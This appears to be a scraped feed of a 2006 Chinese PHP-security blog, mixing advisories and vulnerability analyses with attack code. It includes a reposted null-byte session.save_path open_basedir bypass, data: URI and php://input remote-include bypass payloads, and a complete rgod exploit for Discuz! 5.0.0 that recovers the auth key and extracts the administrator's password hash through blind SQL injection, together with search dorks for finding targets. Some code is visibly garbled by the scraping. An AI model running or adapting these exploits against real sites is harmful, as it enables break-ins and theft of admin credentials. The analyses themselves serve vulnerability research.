唯一让我感兴趣的是 , 在测试session相关函数的时候 . 发现通过修改cookie里的session_id可以在session目录下写新文件并控制文件名为 " sess_ " + $session_id  这样的形式 . 如果能再控制一个写到session_data的变量 , 或许能有所作用 . ( $session_id  有字符限制 , 只允许大小写字母 , 还有 " - " " , " 字符 . 并且不能超过php所在系统的文件名长度限制)

同样的 , 如果我已经得到了一个webshell , 利用session_save_path以及session_set_save_handler , 我们可以在允许的任意目录里以进程的权限写任意文件 , 并没有文件名和内容上的任何限制 . 也许这个能在disable了file相关function时能有用 . PHP - 5.0 . 4版本前的session_save_path甚至能绕过open_basedir在任意有权限的地方写文件


  Topic : PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
   SecurityAlert Id : 43
   SecurityRisk : High
   Remote Exploit : No
   Local Exploit : Yes
   Exploit Given : No
   Credit : Maksymilian Arciemowicz
   Date : 8.12.2006

  Affected Software :  PHP 5.2.0


  Advisory Text :
    -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.0 session.save_path safe_mode and open_basedir bypass]


Author: Maksymilian Arciemowicz (SecurityReason)
Date:
- - Written: 02.10.2006
- - Public: 08.12.2006
SecurityAlert Id: 43
CVE: CVE-2006-6383
SecurityRisk: High
Affected Software: PHP 5.2.0
Advisory URL: http://securityreason.com/achievement_securityalert/43
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and
Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference
Material is freely available.

Session support in PHP consists of a way to preserve certain data across subsequent accesses.
This enables you to build more customized applications and increase the appeal of your web
site.

A visitor accessing your web site is assigned a unique id, the so-called session id. This is
either stored in a cookie on the user side or is propagated in the URL.

session.save_path defines the argument which is passed to the save handler. If you choose the
default files handler, this is the path where the files are created. Defaults to /tmp. See
also session_save_path().

There is an optional N argument to this directive that determines the number of directory
levels your session files will be spread around in. For example, setting to '5;/tmp' may end
up creating a session file and location like
/tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create
all of these directories before use. A small shell script exists in ext/session to do this,
it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic
garbage collection will not be performed, see a copy of php.ini for further information.
Also, if you use N, be sure to surround session.save_path in "quotes" because the
separator (;) is also used for comments in php.ini.

- --- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set in ini_set(), session_save_path() function. In session.save_path
there must be path where you will save yours tmp file. But syntax for session.save_path can
be:

[/PATH]

OR

[N;/PATH]

N - can be a string.

EXAMPLES:
1 .   session_save_path ( " /DIR/WHERE/YOU/HAVE/ACCESS " )

2 .   session_save_path ( " 5;/DIR/WHERE/YOU/HAVE/ACCESS " )

and

3 . session_save_path ( " /DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS " )

- -1477-1493--- Code from PHP520 ext/session/session.c [START]
PHP_FUNCTION( session_save_path )
{
zval  ** p_name;
int ac  =  ZEND_NUM_ARGS();
char  * old;

 if  (ac  <   0   ||  ac  >   1   ||  zend_get_parameters_ex(ac ,   & p_name)  ==  FAILURE)
WRONG_PARAM_COUNT;

old  =  estrdup(PS(save_path));

 if  (ac  ==   1 ) {
convert_to_string_ex(p_name);
zend_alter_ini_entry( " session.save_path " ,   sizeof ( " session.save_path " ) ,
Z_STRVAL_PP(p_name) ,  Z_STRLEN_PP(p_name) ,  PHP_INI_USER ,  PHP_INI_STAGE_RUNTIME);
}

RETVAL_STRING(old ,   0 );
}
- -1477-1493--- Code from PHP520 ext/session/session.c [END]

Values are set to hash_memory (but before that, safe_mode and open_basedir check this
value).
And if you are starting session (for example session_start()), that value from
session.save_path is checked by function PS_OPEN_FUNC(files).

- -242-300--- Code from PHP520 ext/session/mod_files.c [START]
PS_OPEN_FUNC(files)
{
ps_files  * data;
 const  char  * p ,   * last;
 const  char  * argv[ 3 ];
int argc  =   0 ;
size_t dirdepth  =   0 ;
int filemode  =   0600 ;

 if  ( * save_path  ==   ' \0 ' ) {
 /*  if save path is an empty string, determine the temporary dir  */
save_path  =  php_get_temporary_directory();
}

 /*  split up input parameter  */
last  =  save_path;
 =   strchr (save_path ,   ' ; ' );
 while  (p) {
argv[argc ++ =  last;
last  =   ++ p;
 =   strchr (p ,   ' ; ' );
 if  (argc  >   1 break ;
}
argv[argc ++ =  last;

 if  (argc  >   1 ) {
errno  =   0 ;
dirdepth  =  (size_t) strtol(argv[ 0 ] ,   NULL ,   10 );
 if  (errno  ==  ERANGE) {
php_error( E_WARNING ,  
 " The first parameter in session.save_path is invalid " );
 return  FAILURE;
}
}

 if  (argc  >   2 ) {
errno  =   0 ;
filemode  =  strtol(argv[ 1 ] ,   NULL ,   8 );
 if  (errno  ==  ERANGE  ||  filemode  <   0   ||  filemode  >   07777 ) {
php_error( E_WARNING ,  
 " The second parameter in session.save_path is invalid " );
 return  FAILURE;
}
}
save_path  =  argv[argc  -   1 ];

data  =  emalloc( sizeof ( * data));
memset(data ,   0 ,   sizeof ( * data));

data -> fd  =   - 1 ;
data -> dirdepth  =  dirdepth;
data -> filemode  =  filemode;
data -> basedir_len  =   strlen (save_path);
data -> basedir  =  estrndup(save_path ,  data -> basedir_len);

PS_SET_MOD_DATA(data);

 return  SUCCESS;
}
- -242-300--- Code from PHP520 ext/session/mod_files.c [END]

Because in session.save_path there is a NULL byte before ";", strchr() doesn't see
";" and path is /DIR/WHERE/YOU/DONT/HAVE/ACCESS.

Problem exists because safe_mode and open_basedir check what is after ;. And it is needed to
set correct path after ";".

- --- 2. How to fix ---
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
l5x, p_e_a, lorddav, pi3

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards
SecurityReason

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFedKL3Ke13X/fTO4RAms1AKCTSc8CNZmHWhXvOdjtTBcIgdHTuwCgkvrz
9KnewH0rOVFfmPRx2f1x5W4=
=YAP9
-----END PGP SIGNATURE-----


wofeiwo 2006-12-09 12:10 发表评论
]]>PHP 5.2.0对Remote include的影响http://www.phpweblog.net/GaRY/archive/2006/11/03/492.htmlwofeiwowofeiwoFri, 03 Nov 2006 14:03:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/11/03/492.htmlhttp://www.phpweblog.net/GaRY/comments/492.htmlhttp://www.phpweblog.net/GaRY/archive/2006/11/03/492.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/492.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/492.htmlhttp://www.php.net/ChangeLog-5.php#5.2.0
Added allow_url_include ini directive to complement allow_url_fopen. (Rasmus)

也就是说,远程包含文件漏洞,或者是后门,变的很难奏效了。
不过同样有两种方式绕过。

一个是:
include ("php://input");

另一种方式只在5.2.0版本以上才支持:
include ("data:;base64,PD9waHAgcGhwaW5mbygpOz8+"); //phpinfo()

Refence:
http://cn.php.net/manual/en/wrappers.data.php
http://www.faqs.org/rfcs/rfc2397

wofeiwo 2006-11-03 22:03 发表评论
]]>n久没更新http://www.phpweblog.net/GaRY/archive/2006/10/27/480.htmlwofeiwowofeiwoFri, 27 Oct 2006 13:15:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/10/27/480.htmlhttp://www.phpweblog.net/GaRY/comments/480.htmlhttp://www.phpweblog.net/GaRY/archive/2006/10/27/480.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/480.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/480.html
<?php
print_r('
---------------------------------------------------------------------------
Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
       "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to discuz
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0$i<=strlen($string)-1$i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$portdie;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3$i<$argc$i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
    $key = $key ? $key : $GLOBALS['discuz_auth_key'];
    $coded = '';
    $keylength = 32;
    $string = $operation == 'DECODE' ? base64_decode($string: $string;
       for($i = 0$i < strlen($string); $i += 32) {
        $coded .= substr($string, $i, 32^ $key;
    }
    $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
    return $coded;
}

//stolen from install.php
function random($length) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars- 1;
    mt_srand((double)microtime() * 1000000);
    for($i = 0$i < $length$i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

$agent="Googlebot/2.1";
//see sql errors you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0$i<=255$i++){$tt.=chr($i);}
while (1)
{
    $discuz_auth_key=random(32);
    $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
    $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
    $packet.="User-Agent: $agent\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
    $packet.="Accept: text/plain\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    $html=html_entity_decode($html);
    $html=str_replace("<br />","",$html);
    $t=explode("AND m.password='",$html);
    $t2=explode("",$t[1]);
    $pwd_f=$t2[0];
    $t=explode("AND m.secques='",$html);
    $t2=explode("'\n",$t[1]);
    $secques_f=$t2[0];
    $t=explode("AND m.uid='",$html);
    $t2=explode("'\x0d",$t[1]);
    $uid_f=$t2[0];
    $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
    if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
        break;
    }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key
$key="";
for ($j=0$j<32;  $j++){
    for ($i=0$i<255$i++){
        $aa="";
        if ($j<>0){
            for ($k=1$k<=$j$k++){
                $aa.="a";
            }
        }
        $GLOBALS['discuz_auth_key']=$aa.chr($i);
        $t = authcode($temp,"DECODE");
        if ($t[$j]==$my_string[$j]){
            $key.=chr($i);
        }
   }
}

//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0$i<=255$i++)
    {
        if (in_array($i,$chars))
        {
            //you can use every char because of base64_decode()so this bypass magic quotes
            //and some help by extract() to overwrite vars
            $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
            $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
            $packet.="User-Agent: $agent\r\n";
            $packet.="CLIENT-IP: 1.2.3.4\r\n";
            $packet.="Host: ".$host."\r\n";
            $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
            $packet.="Accept: text/plain\r\n";
            $packet.="Connection: Close\r\n\r\n";
            $packet.=$data;
            sendpacketii($packet);
            if (eregi("action=groupexpiry",$html)){
                $password.=chr($i);echo chr($i);sleep(1);break;
            }
        }
        if ($i==255) {
            die("\nExploit failed");
        }
    }
$j++;
}

echo "\nadmin user     -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0$i<=255$i++)
    {
        $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
        $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
        $packet.="User-Agent: $agent\r\n";
        $packet.="CLIENT-IP: 1.2.3.4\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
        $packet.="Accept: text/plain\r\n";
        $packet.="Connection: Close\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        if (eregi("action=groupexpiry",$html)){
            $admin.=chr($i);echo chr($i);sleep(1);break;
        }
        if ($i==255) {die("\nExploit failed");}
   }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
   echo "exploit succeeded";
}
else {
   echo "exploit failed";
}
?>


wofeiwo 2006-10-27 21:15 发表评论
]]>PHP ZendEngine ECalloc Integer Overflow Vulnerabilityhttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.htmlwofeiwowofeiwoTue, 10 Oct 2006 11:05:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.htmlhttp://www.phpweblog.net/GaRY/comments/451.htmlhttp://www.phpweblog.net/GaRY/archive/2006/10/10/451.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/451.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/451.html
这个洞目前只在cvs里做了修补,PHP 5.1.6都有影响,而且是php底部api出的问题,应该是很多函数都有影响.
看起来貌似很爽的样子
http://www.securityfocus.com/bid/20349/info
http://cvs.php.net/viewvc.cgi/ZendEngine2/zend_alloc.c?r1=1.161&r2=1.162

比如下面这个漏洞就是由ecalloc引起的:

PHP unserialize() Array Creation Integer Overflow
http://www.hardened-php.net/advisory_092006.133.html

真是应了我上篇日志的话,以后php漏洞,得往底层找去,底层找才有出路啊

wofeiwo 2006-10-10 19:05 发表评论
]]>随便说说http://www.phpweblog.net/GaRY/archive/2006/10/03/446.htmlwofeiwowofeiwoTue, 03 Oct 2006 15:37:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/10/03/446.htmlhttp://www.phpweblog.net/GaRY/comments/446.htmlhttp://www.phpweblog.net/GaRY/archive/2006/10/03/446.html#Feedback2http://www.phpweblog.net/GaRY/comments/commentRss/446.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/446.html国内的比如dz,比如ctb,比如pw
国外的比如wp,比如phpmyadmin等等
要么和unset有关,要么和$_SERVER 有关.
看来,以后要挖PHP应用层漏洞,特别是现在dz等软件越发展越安全的前景下.
突破点就得往PHP底层找了

wofeiwo 2006-10-03 23:37 发表评论
]]>关于最近的几个open_basedir绕过漏洞http://www.phpweblog.net/GaRY/archive/2006/08/23/350.htmlwofeiwowofeiwoWed, 23 Aug 2006 12:38:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/23/350.htmlhttp://www.phpweblog.net/GaRY/comments/350.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/23/350.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/350.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/350.htmlPHP 5.1.5 在8.17号发布了,修补了几个绕过open_basedir的漏洞,我们一个个来看:

Quote form http://www.php.net/release_5_1_5.php

Added missing safe_mode/open_basedir checks inside the error_log(), file_exists(), imap_open() and imap_reopen() functions.
Fixed possible open_basedir/safe_mode bypass in cURL extension and with realpath cache.

首先是error_log().奇怪的是,我对比了5.1.5和5.1.2的代码,并没有发现PHP_FUNCTION(error_log)以及PHPAPI int _php_error_log有任何改变.而且在 bugs.php.net 上没有search到任何关于此bug的报告.测试5.1.2的时候,也没发现error_log函数能绕过open_basedir的限制任意写文件.

Warning: error_log(): open_basedir restriction in effect. File(C:\err.txt) is not within the allowed path(s): (D:\phproot;D:\admin\) in D:\phproot\test\error.php on line 2 Warning: error_log(C:\err.txt): failed to open stream: Operation not permitted in D:\phproot\test\error.php on line 2
<?
error_log("You messed up!", 3, "C:\\err.txt");
?> 

其次是file_exists().这个漏洞很无聊.最多只能判断这个文件是否存在而已.无法做些有意义的动作.
有意思的是,在研究代码的时候,发现饶过open_basedir的不光是file_exists函数.在php源代码中,对大多数处理文件的函数组都使用了同一个宏:

FileFunction(PHP_FN(file_exists), FS_EXISTS)

然后FileFunction再调用 php_stat(Z_STRVAL_PP(filename), (php_stat_len) Z_STRLEN_PP(filename), funcnum, return_value TSRMLS_CC) 进行处理.所以同样的饶过漏洞也存在与同样使用此宏,并且返回值都是BOOL类型的is_executable,is_writeable,is_readable,is_dir,is_file,is_link函数.

imap_open()和imap_reopen()
这两个比较有意思,但是要求是必须要有imap扩展库,漏洞出在imap_open函数的第一个参数.如果把inbox替换为文件或目录,就能用imap相关函数对其进行处理.
http://bugs.php.net/bug.php?id=37265

cURL
没什么好说拉.securityreason已经贴出了详细的分析和POC,url贴出来,自己看吧 : )
http://securityreason.com/achievement_securityalert/39

wofeiwo 2006-08-23 20:38 发表评论
]]>punbbhttp://www.phpweblog.net/GaRY/archive/2006/08/21/punbb_unset.htmlwofeiwowofeiwoMon, 21 Aug 2006 02:24:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/21/punbb_unset.htmlhttp://www.phpweblog.net/GaRY/comments/344.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/21/punbb_unset.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/344.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/344.htmlin punbb-1.2.12 search.php line 54:

 1 if (isset($search_id)) unset($search_id);
 2 
 3 // If a search_id was supplied
 4 if (isset($_GET['search_id']))
 5 {
 6     $search_id = intval($_GET['search_id']);
 7     if ($search_id < 1)
 8         message($lang_common['Bad request']);
 9 }
10 
11 // ......
12 // something not effect
13 // ......
14 // ......
15 // and in line 100:
16 
17 if (isset($search_id))
18 {
19     $ident = ($pun_user['is_guest']) ? get_remote_address() : $pun_user['username'];
20 
21     $result = $db->query('SELECT search_data FROM '.$db->prefix.'search_cache WHERE id='.$search_id.' AND ident=\''.$db->escape($ident).'\'') or error('Unable to fetch search results', __FILE__, __LINE__, $db->error());
22 


Can you guys realize something?
Yes, you are right.
We can use $_POST[search_id] with the Zend_Hash_Del_Key_Or_Index Vulnerability to exploit it!
But in fact,in common.php line 39:

1 // Reverse the effect of register_globals
2 if (@ini_get('register_globals'))
3     unregister_globals();
4 


I hate punbb.... 



wofeiwo 2006-08-21 10:24 发表评论
]]>PHP Variable Zend Hash Calculaterhttp://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_Variable_Zend_Hash_Calculater.htmlwofeiwowofeiwoTue, 15 Aug 2006 08:41:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_Variable_Zend_Hash_Calculater.htmlhttp://www.phpweblog.net/GaRY/comments/325.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_Variable_Zend_Hash_Calculater.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/325.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/325.html /*
*
* PHP Variable Zend Hash Calculater
* Author: wofeiwo
*
 */

# include <stdio.h>
# include <stdlib.h>
# include <string.h>

unsigned long zend_inline_hash_func(char  * arKey ,  int nKeyLength ,  int nVersion)
{
    unsigned long h  =   5381 ;
    char  * arEnd  =  arKey  +  nKeyLength;
 
     while  (arKey  <  arEnd) {
        h  +=  (h  <<   5 );
         switch (nVersion){
         case   4 :  h  ^=  (unsigned long)  * arKey ++ ; break ;
         case   5 :  h  +=  (unsigned long)  * arKey ++ ; break ;
        }
    }
     return  h;
}

int main(int argc ,  char  * argv[])
{
    unsigned long hash4;
    unsigned long hash5 ;

     printf ( " PHP Variable Zend Hash Calculater\r\nAuthor: wofeiwo\r\n\r\n " );
     if (argc  !=   2
    {
         printf ( " Usage: %s <string>\r\n " ,  argv[ 0 ]);
         exit ( 1 );
    }

    hash4  =  zend_inline_hash_func(argv[ 1 ] ,   strlen (argv[ 1 ]) + 1 ,   4 );
    hash5  =  zend_inline_hash_func(argv[ 1 ] ,   strlen (argv[ 1 ]) + 1 ,   5 );
     printf ( " String: %s\r\nPHP4 HASH: %ld\r\nPHP5 HASH: %ld\r\n " ,  argv[ 1 ] ,  hash4 ,  hash5);
     return   0 ;
}

wofeiwo 2006-08-15 16:41 发表评论
]]>PHP substr_compare() Vulnerability 浅析http://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_substr_compare_Vulnerability.htmlwofeiwowofeiwoTue, 15 Aug 2006 06:42:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_substr_compare_Vulnerability.htmlhttp://www.phpweblog.net/GaRY/comments/321.htmlhttp://www.phpweblog.net/GaRY/archive/2006/08/15/PHP_substr_compare_Vulnerability.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/321.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/321.html 新blog开张,贴个文章测试一下

 PHP substr_compare() Vulnerability 浅析

Author: wofeiwo
Date: Aug 14th 2006

先看看公告:


PHP多个远程安全漏洞

发布日期:2006-08-03
更新日期:2006-08-04

受影响系统:
PHP PHP 4.4.x
不受影响系统:
PHP PHP 4.4.3
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2006-3016

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的substr_compare()函数没有正确的验证偏移/长度参数。此外,PHP还没有正确的处理会话名称中的某些字符。攻击者可以利用这些漏洞远程执行任意代码。

<*来源:Secunia
  
  链接:http://secunia.com/advisories/21328/print/
        http://www.php.net/release_4_4_3.php
*>


公告里只说明影响为 PHP <= 4.4.3, 其实 PHP 5.1.3 以下也受到这个漏洞影响.

再来看看 PHP 手册里对这个函数的描述.


Description

int   substr_compare   (   string   main_str  ,     string   str  ,   int offset [  ,   int length [  ,   bool case_insensitivity]] ) 

substr_compare() compares main_str from position offset with str up to length characters. 

Returns < 0 if main_str from position offset is less than str, > 0 if it is greater than str, and 0 if they are equal. If length is equal or greater than length of main_str and length is set, substr_compare() prints warning and returns FALSE. 

If case_insensitivity is TRUE, comparison is case insensitive


看来是一个比较字符串与子字符串的函数.下面来分析漏洞原因,看代码:

//   ripped from PHP-5.1.2  
PHP_FUNCTION(  substr_compare  ) 

    char   *  s1  ,     *  s2; 
    int s1_len  ,   s2_len; 
    long offset  ,   len  =   0  ; 
    zend_bool cs  =   0  ; 
    uint cmp_len; 

      if   (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC  ,     "  ssl|lb  "   ,     &  s1  ,     &  s1_len  ,     &  s2  ,     &  s2_len  ,     &  offset  ,     &  len  ,     &  cs)   ==   FAILURE) { 
        RETURN_FALSE; 
    } 

      if   (len   &&   offset   >=   s1_len) {    //   简单的检查了 len 是否 != 0 并且 offset 大于 strlen(main_str). 但是 len 和 offset 都可以为负数  
        php_error_docref(  NULL   TSRMLS_CC  ,     E_WARNING   ,     "  The start position cannot exceed initial string length.  "  ); 
        RETURN_FALSE; 
    } 

      if   (offset   <     0  ) {   //   offset 为负数,则从 main_str 的尾向前偏移  
        offset   =   s1_len   +   offset;   //   这里出现问题了.如果 offset 是负数,且绝对值大于 s1_len 呢?得到的 offset 仍然为负数  
    } 

    cmp_len   =   (uint) (len   ?   len   :     MAX  (s2_len  ,   (s1_len   -   offset)));   //   这里确定比较的长度,很容易被控制.  

      if   (  !  cs) {   //   传递参数给 zend_binary_strncmp 或 zend_binary_strncasecmp  
        RETURN_LONG(zend_binary_strncmp(s1   +   offset  ,   (s1_len   -   offset)  ,   s2  ,   s2_len  ,   cmp_len)); 
    }   else   { 
        RETURN_LONG(zend_binary_strncasecmp(s1   +   offset  ,   (s1_len   -   offset)  ,   s2  ,   s2_len  ,   cmp_len)); 
    } 

再来看 zend_binary_strncmp 函数:

ZEND_API int zend_binary_strncmp(char   *  s1  ,   uint len1  ,   char   *  s2  ,   uint len2  ,   uint length) 

    int retval; 
     
    retval   =   memcmp(s1  ,   s2  ,     MIN  (length  ,     MIN  (len1  ,   len2))); 
      if   (  !  retval) { 
          return   (  MIN  (length  ,   len1)   -     MIN  (length  ,   len2)); 
    }   else   { 
          return   retval; 
    } 

很明显,如果提交我们设计的参数,很容易造成crash.

下面是 PHP-5.1.4 修补后的代码

//   ripped from PHP-5.1.4  
PHP_FUNCTION(  substr_compare  ) 

    char   *  s1  ,     *  s2; 
    int s1_len  ,   s2_len; 
    long offset  ,   len  =   0  ; 
    zend_bool cs  =   0  ; 
    uint cmp_len; 

      if   (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC  ,     "  ssl|lb  "   ,     &  s1  ,     &  s1_len  ,     &  s2  ,     &  s2_len  ,     &  offset  ,     &  len  ,     &  cs)   ==   FAILURE) { 
        RETURN_FALSE; 
    } 

      if   (ZEND_NUM_ARGS()   >=     4     &&   len   <=     0  ) {   //   len不能为负数了  
        php_error_docref(  NULL   TSRMLS_CC  ,     E_WARNING   ,     "  The length must be greater than zero  "  ); 
        RETURN_FALSE; 
    } 

      if   (offset   <     0  ) { 
        offset   =   s1_len   +   offset; 
        offset   =   (offset   <     0  )   ?     0     :   offset;    //   检查是否 offset 仍然为负数,是,则设为0  
    } 

      if   ((offset   +   len)   >=   s1_len) {   //   offset+len 也不能大于 s1_len  
        php_error_docref(  NULL   TSRMLS_CC  ,     E_WARNING   ,     "  The start position cannot exceed initial string length  "  ); 
        RETURN_FALSE; 
    } 

    cmp_len   =   (uint) (len   ?   len   :     MAX  (s2_len  ,   (s1_len   -   offset))); 

      if   (  !  cs) { 
        RETURN_LONG(zend_binary_strncmp(s1   +   offset  ,   (s1_len   -   offset)  ,   s2  ,   s2_len  ,   cmp_len)); 
    }   else   { 
        RETURN_LONG(zend_binary_strncasecmp(s1   +   offset  ,   (s1_len   -   offset)  ,   s2  ,   s2_len  ,   cmp_len)); 
    } 


wofeiwo 2006-08-15 14:42 发表评论
]]>